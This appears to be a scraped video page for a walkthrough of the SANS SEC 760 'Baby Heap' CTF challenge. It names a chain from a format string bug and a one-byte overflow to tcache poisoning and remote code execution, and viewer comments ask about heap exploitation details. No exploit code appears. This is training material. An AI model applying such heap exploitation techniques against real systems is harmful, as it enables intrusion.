Remote Code Execution via Tcache Poisoning - SANS SEC 760 "Baby Heap" CTF
HTML-код
- Опубликовано: 18 окт 2024
- A video walkthough for SANS SEC 760s "Baby Heap" CTF challenge which involved exploiting a format string vulnerability and a one-byte overflow to poison tcache and gain remote code execution.
NOTE - There seem to be some slight errors in the video, my apology!
At 27:50, 0x101 is meant to be 257 not 254
When explaining the A, M, and P flags for the Heap Chunks, those are supposed to be "bits" not "bytes"
🔗 Links From Video:
/ 1233119624658481157
azeria-labs.co...
👨💻 Gear I Use:
Microphone: Audio Technica AT2020USB+
Camera: Logitech HD Pro Webcam C920
Headphones: Shure SE215 (Sound Isolating)
Keyboard: Ducky One White LED Double Shot PBT (MX Brown)
Mouse: Logitech G703 Lightspeed
💻 Social:
Blog: jhalon.github.io
Twitter: / jack_halon
GitHub: github.com/jhalon
Twitch: / jackhackslive
![Leaking Secret Data with a Heap Overflow - "Leek" Pwn Challenge [Angstrom CTF 2023]](/img/1.gif)
I was confused by the technique for several days until I came across this .Fabulous video!
the explanation was soo clear! I struggled with finding the proof of work for a challenge while playing CTF's. Glad I came across this video. Recently been trying to make a challenge based on tcache poisoning. Your video walkthrough really helped! Thanks a lot.
One of the most informative videos I have seen about heap exploiting! Thanks!
This is soo informative and really well explained! Thank you soo much
Thanks a ton!!! Really helpful video ❤️
Thank you for the very informative walk-through , best Linux heap exploitation video :)
Absolutely phenomenal video. Illustrative and informative.
Really nice vid, learned a lot.
Can you please explain why do you have to use 0xf8 for initial malloc for the one byte overflow? Couldn't any size exploit the one byte oveflow?
Another question, when did we exploit tcache? I didn't see where that came into play
Tcache is a technique use by the heap (as you can see in the vid) to improve heap management, he crearly respond in the video to both of your questions.
I love the video. Its amazing. Thx. Can you tell me how software you used to create the animations (arrows and text) in vídeo ? I not ask about the exploit because I have to learn a lot to understanding heap exploitation.
Nice walkthrough, more heap exploitation please
Great video man, come back
Great video! Thank you so much.
Which glibc are you using on your system? I don't have the same output using gef/pwndbg on libc2.27 (Ubuntu 18) when freeing the 2nd and 3rd chunk.
Hi JackHacks... first of all, thank you for your video. Can you help me? I'm trying to develop an exploit based in your heap exploitation, but my exploit freezes when I send data without '
'. It only works if I use s.sendlineafter("Data: ", data), but I NEED to use s.sendafter("Data: ", data) (without '
') to explore "off by one Overflow" vulnerability. What I am doing wrong? Thanks in advance.
at 27:50, isn't 0x101 in decimal 257 not 254?
Yes you would be correct! It would be 257, seems I made a mistake in my script 😅. There seem to be some other errors like when I say "bytes" instead of "bits" - will be putting out a disclaimer note for those soon.
0x101 =257 you did a little listak : 254 ; but its cool